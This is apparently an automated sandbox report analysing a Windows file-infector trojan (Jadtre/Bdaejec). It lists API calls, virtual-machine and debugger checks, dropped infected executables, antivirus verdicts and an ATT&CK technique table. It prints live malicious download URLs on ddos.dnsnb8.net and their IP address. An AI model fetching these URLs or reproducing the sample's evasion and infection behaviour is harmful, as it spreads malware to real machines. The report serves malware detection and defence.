    Source: C:\Users\user\Desktop\gT6IitwToH.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-7016
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeCode function: 1_2_00251718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00251754h1_2_00251718
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeCode function: 1_2_002529E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,1_2_002529E2
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeCode function: 1_2_00252B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,1_2_00252B8C
    Source: Amcache.hve.1.drBinary or memory string: VMware
    Source: Amcache.hve.1.drBinary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.1.drBinary or memory string: vmci.syshbin
    Source: Amcache.hve.1.drBinary or memory string: VMware, Inc.
    Source: Amcache.hve.1.drBinary or memory string: VMware20,1hbin@
    Source: Amcache.hve.1.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.1.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.1.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: IivJTsFD.exe, 00000001.00000003.1673168646.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, IivJTsFD.exe, 00000001.00000002.1948509714.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp, IivJTsFD.exe, 00000001.00000003.1673168646.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, IivJTsFD.exe, 00000001.00000002.1948509714.0000000000F6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: Amcache.hve.1.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.1.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: Amcache.hve.1.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.1.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.1.drBinary or memory string: vmci.sys
    Source: Amcache.hve.1.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
    Source: Amcache.hve.1.drBinary or memory string: vmci.syshbin`
    Source: Amcache.hve.1.drBinary or memory string: \driver\vmci,\driver\pci
    Source: Amcache.hve.1.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.1.drBinary or memory string: VMware20,1
    Source: Amcache.hve.1.drBinary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.1.drBinary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.1.drBinary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.1.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.1.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.1.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.1.drBinary or memory string: VMware PCI VMCI Bus Device
    Source: Amcache.hve.1.drBinary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.1.drBinary or memory string: VMware Virtual RAM
    Source: Amcache.hve.1.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: Amcache.hve.1.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeAPI call chain: ExitProcess graph end nodegraph_1-1033
    Source: C:\Users\user\Desktop\gT6IitwToH.exeCode function: 0_2_00401EE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00401EE2
    Source: C:\Users\user\Desktop\gT6IitwToH.exeCode function: 0_2_00409607 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_00409607
    Source: C:\Users\user\Desktop\gT6IitwToH.exeCode function: 0_2_00414044 mov eax, dword ptr fs:[00000030h]0_2_00414044
    Source: C:\Users\user\Desktop\gT6IitwToH.exeCode function: 0_2_0040CD6B CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_0040CD6B
    Source: C:\Users\user\Desktop\gT6IitwToH.exeCode function: 0_2_00409867 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,0_2_00409867
    Source: C:\Users\user\Desktop\gT6IitwToH.exeCode function: 0_2_00406000 SetUnhandledExceptionFilter,0_2_00406000
    Source: C:\Users\user\Desktop\gT6IitwToH.exeCode function: 0_2_00401EE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00401EE2
    Source: C:\Users\user\Desktop\gT6IitwToH.exeCode function: 0_2_004035C0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_004035C0
    Source: SciTE.exe.1.drBinary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX
    Source: C:\Users\user\Desktop\gT6IitwToH.exeCode function: GetLocaleInfoA,0_2_0040A82A
    Source: C:\Users\user\Desktop\gT6IitwToH.exeCode function: 0_2_00406507 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00406507
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeCode function: 1_2_0025139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,1_2_0025139F
    Source: Amcache.hve.1.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: Amcache.hve.1.drBinary or memory string: msmpeng.exe
    Source: Amcache.hve.1.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.1.drBinary or memory string: MsMpEng.exe

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: Process Memory Space: IivJTsFD.exe PID: 4908, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: Process Memory Space: IivJTsFD.exe PID: 4908, type: MEMORYSTR
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
    Command and Scripting Interpreter
    1
    DLL Side-Loading
    1
    Access Token Manipulation
    1
    Masquerading
    11
    Input Capture
    11
    System Time Discovery
    1
    Taint Shared Content
    11
    Input Capture
    1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts3
    Native API
    Boot or Logon Initialization Scripts2
    Process Injection
    1
    Access Token Manipulation
    LSASS Memory131
    Security Software Discovery
    Remote Desktop Protocol1
    Archive Collected Data
    11
    Non-Standard Port
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
    DLL Side-Loading
    2
    Process Injection
    Security Account Manager1
    Process Discovery
    SMB/Windows Admin SharesData from Network Shared Drive2
    Ingress Tool Transfer
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Deobfuscate/Decode Files or Information
    NTDS2
    File and Directory Discovery
    Distributed Component Object ModelInput Capture2
    Non-Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
    Obfuscated Files or Information
    LSA Secrets13
    System Information Discovery
    SSHKeylogging12
    Application Layer Protocol
    Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
    Software Packing
    Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    DLL Side-Loading
    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    gT6IitwToH.exe89%VirustotalBrowse
    gT6IitwToH.exe97%ReversingLabsWin32.Virus.Jadtre
    gT6IitwToH.exe100%AviraW32/Jadtre.B
    gT6IitwToH.exe100%Joe Sandbox ML
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Temp\IivJTsFD.exe100%AviraTR/Dldr.Small.Z.haljq
    C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Jadtre.B
    C:\Program Files\7-Zip\Uninstall.exe100%AviraW32/Jadtre.B
    C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%AviraW32/Jadtre.B
    C:\Users\user\AppData\Local\Temp\IivJTsFD.exe100%Joe Sandbox ML
    C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
    C:\Program Files\7-Zip\Uninstall.exe100%Joe Sandbox ML
    C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Temp\IivJTsFD.exe97%ReversingLabsWin32.Trojan.Skeeyah
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://www.rftp.comJosiah0%Avira URL Cloudsafe
    http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE0%Avira URL Cloudsafe
    http://www.activestate.com0%Avira URL Cloudsafe
    http://www.scintilla.org/scite.rng0%Avira URL Cloudsafe
    http://ddos.dnsnb8.net:799/cj//k1.rarN100%Avira URL Cloudmalware
    http://ddos.dnsnb8.net:799/cj//k1.rar9100%Avira URL Cloudmalware
    http://www.rftp.com0%Avira URL Cloudsafe
    http://ddos.dnsnb8.net/?ll100%Avira URL Cloudmalware
    http://www.activestate.comHolger0%Avira URL Cloudsafe
    http://ddos.dnsnb8.net/6lk100%Avira URL Cloudmalware
    http://www.baanboard.comBrendon0%Avira URL Cloudsafe
    https://www.smartsharesystems.com/0%Avira URL Cloudsafe
    https://www.smartsharesystems.com/Morten0%Avira URL Cloudsafe
    http://www.scintilla.org0%Avira URL Cloudsafe
    http://www.spaceblue.comMathias0%Avira URL Cloudsafe
    http://ddos.dnsnb8.net:799/cj//k1.rar100%Avira URL Cloudmalware
    http://www.lua.org0%Avira URL Cloudsafe
    http://ddos.dnsnb8.net:799/cj//k1.rarW100%Avira URL Cloudmalware
    http://www.spaceblue.com0%Avira URL Cloudsafe
    http://www.develop.com0%Avira URL Cloudsafe
    http://www.baanboard.com0%Avira URL Cloudsafe
    http://www.develop.comDeepak0%Avira URL Cloudsafe
    http://ddos.dnsnb8.net:799/cj//k1.rarh100%Avira URL Cloudmalware
    http://ddos.dnsnb8.net:799/cj//k1.rarcC:100%Avira URL Cloudmalware
    NameIPActiveMaliciousAntivirus DetectionReputation
    ddos.dnsnb8.net
    44.221.84.105
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      http://ddos.dnsnb8.net:799/cj//k1.rartrue
      • Avira URL Cloud: malware
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://www.scintilla.org/scite.rngSciTE.exe.1.drfalse
      • Avira URL Cloud: safe
      unknown
      http://ddos.dnsnb8.net:799/cj//k1.rar9IivJTsFD.exe, 00000001.00000002.1948509714.0000000000ECE000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      http://www.rftp.comJosiahSciTE.exe.1.drfalse
      • Avira URL Cloud: safe
      unknown
      http://www.activestate.comSciTE.exe.1.drfalse
      • Avira URL Cloud: safe
      unknown
      http://ddos.dnsnb8.net/?llIivJTsFD.exe, 00000001.00000003.1673168646.0000000000F31000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      http://www.activestate.comHolgerSciTE.exe.1.drfalse
      • Avira URL Cloud: safe
      unknown
      http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DEIivJTsFD.exe, 00000001.00000003.1653432103.00000000011E0000.00000004.00001000.00020000.00000000.sdmp, IivJTsFD.exe, 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://ddos.dnsnb8.net:799/cj//k1.rarNIivJTsFD.exe, 00000001.00000003.1673168646.0000000000F31000.00000004.00000020.00020000.00000000.sdmp, IivJTsFD.exe, 00000001.00000002.1948509714.0000000000F31000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      http://upx.sf.netAmcache.hve.1.drfalse
        high
        http://www.rftp.comSciTE.exe.1.drfalse
        • Avira URL Cloud: safe
        unknown
        http://ddos.dnsnb8.net/6lkIivJTsFD.exe, 00000001.00000003.1673168646.0000000000F31000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://www.baanboard.comBrendonSciTE.exe.1.drfalse
        • Avira URL Cloud: safe
        unknown
        https://www.smartsharesystems.com/SciTE.exe.1.drfalse
        • Avira URL Cloud: safe
        unknown
        http://www.scintilla.orgSciTE.exe.1.drfalse
        • Avira URL Cloud: safe
        unknown
        http://www.spaceblue.comMathiasSciTE.exe.1.drfalse
        • Avira URL Cloud: safe
        unknown
        https://www.smartsharesystems.com/MortenSciTE.exe.1.drfalse
        • Avira URL Cloud: safe
        unknown
        http://www.develop.comSciTE.exe.1.drfalse
        • Avira URL Cloud: safe
        unknown
        http://www.lua.orgSciTE.exe.1.drfalse
        • Avira URL Cloud: safe
        unknown
        http://ddos.dnsnb8.net:799/cj//k1.rarWIivJTsFD.exe, 00000001.00000002.1948509714.0000000000ECE000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://www.spaceblue.comSciTE.exe.1.drfalse
        • Avira URL Cloud: safe
        unknown
        http://www.baanboard.comSciTE.exe.1.drfalse
        • Avira URL Cloud: safe
        unknown
        http://www.develop.comDeepakSciTE.exe.1.drfalse
        • Avira URL Cloud: safe
        unknown
        http://ddos.dnsnb8.net:799/cj//k1.rarhIivJTsFD.exe, 00000001.00000002.1948793448.000000000130A000.00000004.00000010.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://ddos.dnsnb8.net:799/cj//k1.rarcC:IivJTsFD.exe, 00000001.00000003.1673168646.0000000000F6E000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        44.221.84.105
        ddos.dnsnb8.netUnited States
        14618AMAZON-AESUSfalse
        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1581652
        Start date and time:2024-12-28 12:23:08 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 4m 41s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:9
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:gT6IitwToH.exe
        renamed because original name is a hash value
        Original Sample Name:8da10c130681fd03a6b64ad9a827a433.exe
        Detection:MAL
        Classification:mal100.spre.troj.evad.winEXE@5/11@1/1
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:
        • Successful, ratio: 99%
        • Number of executed functions: 20
        • Number of non-executed functions: 23
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
        • Excluded IPs from analysis (whitelisted): 20.42.73.29, 40.126.53.8, 4.175.87.197, 13.107.246.63
        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtOpenFile calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        TimeTypeDescription
        06:24:25API Interceptor1x Sleep call for process: WerFault.exe modified
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        44.221.84.105REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
        • saytjshyf.biz/xoqfqirqhp
        HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
        • npukfztj.biz/edmrjb
        http://setup.ghwr87ytiuwhgf4ihsjdnbbdvsh.comGet hashmaliciousUnknownBrowse
        • setup.ghwr87ytiuwhgf4ihsjdnbbdvsh.com/favicon.ico
        HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
        • saytjshyf.biz/eglmpsrvxnyx
        HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
        • saytjshyf.biz/peioi
        PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
        • npukfztj.biz/cbecuogqej
        Ziraat_Swift.htaGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
        • saytjshyf.biz/bkq
        invoice_96.73.exeGet hashmaliciousFormBookBrowse
        • jhvzpcfg.biz/tgcwttfqletfhyq
        Order SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
        • hehckyov.biz/ircdert
        C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
        • hehckyov.biz/xc
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        ddos.dnsnb8.net#U65b0#U7248#U7f51#U5173.exeGet hashmaliciousBdaejec, Neshta, RamnitBrowse
        • 44.221.84.105
        #U8865#U4e01#U6253#U5305.exeGet hashmaliciousBdaejec, Neshta, RamnitBrowse
        • 44.221.84.105
        #U65b0#U7248#U7f51#U5173Srv.exeGet hashmaliciousBdaejec, Neshta, RamnitBrowse
        • 44.221.84.105
        gE4NVCZDRk.exeGet hashmaliciousBdaejec, RunningRATBrowse
        • 44.221.84.105
        ib.exeGet hashmaliciousBdaejecBrowse
        • 44.221.84.105
        SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeGet hashmaliciousBdaejecBrowse
        • 44.221.84.105
        1hdqYXYJkr.exeGet hashmaliciousBdaejecBrowse
        • 44.221.84.105
        7Y18r(193).exeGet hashmaliciousBdaejec, StealcBrowse
        • 44.221.84.105
        BUG32.exeGet hashmaliciousBdaejecBrowse
        • 44.221.84.105
        7Y18r(212).exeGet hashmaliciousBdaejecBrowse
        • 44.221.84.105
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        AMAZON-AESUSa2mNMrPxow.exeGet hashmaliciousUnknownBrowse
        • 3.218.7.103
        SgMuuLxOCJ.exeGet hashmaliciousLummaCBrowse
        • 34.226.108.155
        TNyOrM6mIM.exeGet hashmaliciousLummaCBrowse
        • 3.218.7.103
        FIyDwZM4OR.exeGet hashmaliciousUnknownBrowse
        • 3.218.7.103
        ZFttiy4Tt8.exeGet hashmaliciousUnknownBrowse
        • 3.218.7.103
        e62iSl0abZ.exeGet hashmaliciousUnknownBrowse
        • 3.218.7.103
        HGFSqmKwd5.exeGet hashmaliciousUnknownBrowse
        • 34.226.108.155
        A3nofpjN9A.exeGet hashmaliciousUnknownBrowse
        • 3.218.7.103
        QMtCX5RLOP.exeGet hashmaliciousUnknownBrowse
        • 34.226.108.155
        j2nLC29vCy.exeGet hashmaliciousLummaCBrowse
        • 3.218.7.103
        No context
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        C:\Users\user\AppData\Local\Temp\IivJTsFD.exe#U65b0#U7248#U7f51#U5173.exeGet hashmaliciousBdaejec, Neshta, RamnitBrowse
          #U8865#U4e01#U6253#U5305.exeGet hashmaliciousBdaejec, Neshta, RamnitBrowse
            #U65b0#U7248#U7f51#U5173Srv.exeGet hashmaliciousBdaejec, Neshta, RamnitBrowse
              gE4NVCZDRk.exeGet hashmaliciousBdaejec, RunningRATBrowse
                ib.exeGet hashmaliciousBdaejecBrowse
                  SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeGet hashmaliciousBdaejecBrowse
                    8VB4lVuZk3.exeGet hashmaliciousBdaejecBrowse
                      biKy3nZEyJ.exeGet hashmaliciousBdaejecBrowse
                        biKy3nZEyJ.exeGet hashmaliciousBdaejecBrowse
                          #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeGet hashmaliciousBdaejec, SalityBrowse
                            Process:C:\Users\user\AppData\Local\Temp\IivJTsFD.exe
                            File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):19456
                            Entropy (8bit):6.590296079331186
                            Encrypted:false
                            SSDEEP:384:1F3ScXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:a8QGPL4vzZq2o9W7GsxBbPr
                            MD5:9A4236DD8391045D8E0870AC55B5196D
                            SHA1:2B67524E9B6287F9D815870CBC567382EDFD296E
                            SHA-256:8A4D9F88C8BD997EC21C56516E5C8240331AF03A7FD2BD1E733556B3F3396944
                            SHA-512:8D388AE7D4D352DF7205FB99CB53EE89285D605F02F212B4DF1F59CD06036EE4AD5EE0177D1084039778DCA37035D2CDC0EBB6FE470F48143DB89C50D6E6B03D
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            Reputation:low
                            Preview:MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................
                            Process:C:\Users\user\AppData\Local\Temp\IivJTsFD.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):2389504
                            Entropy (8bit):6.731347158825253
                            Encrypted:false
                            SSDEEP:49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
                            MD5:9EF33468DC6B0452C1A805058B665505
                            SHA1:74A3E5AEAADC0B91B6DF1DFE2F50856AFE8775D8
                            SHA-256:B48613AF7959B5375DF9D0EBB4A6B62F1F8C8C1EACB96785D1F4C54975610BB4
                            SHA-512:6D2EAD2F8C9D97F269C5F9862F8192B4A9E827BB7024F8D186312570A002794DE6C884915BBF08067EA938652F51360E3F602E4176B97610A1FC423819C7617D
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            Reputation:low
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\IivJTsFD.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):31744
                            Entropy (8bit):6.3665208819231145
                            Encrypted:false
                            SSDEEP:768:uWQ3655Kv1X/qY1MSdaoQGPL4vzZq2o9W7GsxBbPr:uHqaNrFdajGCq2iW7z
                            MD5:276E8B5BA1C506406F19F82FF218408B
                            SHA1:7C76E0619FE397B8BC77B9E0FFE8D3E7F086D7CC
                            SHA-256:4F6F6AEB82D1D8F18655556CCA306F2E9C69003AB3279F5D6ECA4704F884145F
                            SHA-512:67FDEF896B35869F0458619ECFDCE7D891ECB6557043ADFCEB48FD473D0CEDA80A389E9D082B5A128209970B69EE40D1D17BA461A6774A4BDDC3BC94425FC837
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            Reputation:low
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.9904703614805956
                            Encrypted:false
                            SSDEEP:192:D4lGL2n4MYm0z8b4j8/AmzuiFJZ24IO8QYd:2GLG4MYNz8b4jwzuiFJY4IO8QY
                            MD5:9724B48FF54A4D1CA9646048AE121DE1
                            SHA1:D8257D884B067814C50E32E1CAB5DA4A7515A7D6
                            SHA-256:640852CB46D1B43EF3DB649D6616B001B0BB05D9BD637EB851579FCC61B1F5B0
                            SHA-512:C767C18A40301C2217D0F83ED1BC14D0CEC121150C924E59E79E809148542CF58602DCF5A9DDFF0DE593B0567828F83CD48F089053608FCF5D34351E0CBDF750
                            Malicious:false
                            Reputation:low
